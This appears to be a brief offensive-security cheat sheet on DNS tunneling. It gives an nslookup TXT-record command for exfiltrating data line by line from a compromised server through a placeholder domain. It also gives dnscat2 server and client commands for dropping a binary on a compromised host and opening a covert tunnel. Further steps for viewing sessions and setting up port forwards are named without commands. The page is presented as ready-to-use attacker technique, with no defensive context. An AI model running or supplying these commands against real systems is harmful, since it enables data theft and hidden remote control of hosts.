DNS Tunneling

Data can be exfiltrated using DNS records and the protocol itself

Create a txt record on compromised server and exfil line by line

nslookup -type=txt exfiltrated.data.dogs.corp

dnscat2

Spin up dnscat2 server

dnscat2-server feline.corp

Drop binary on compromised host and create tunnel

./dnscat feline.corp

View sessions

Interact with a session

Set up a port forward

Last updated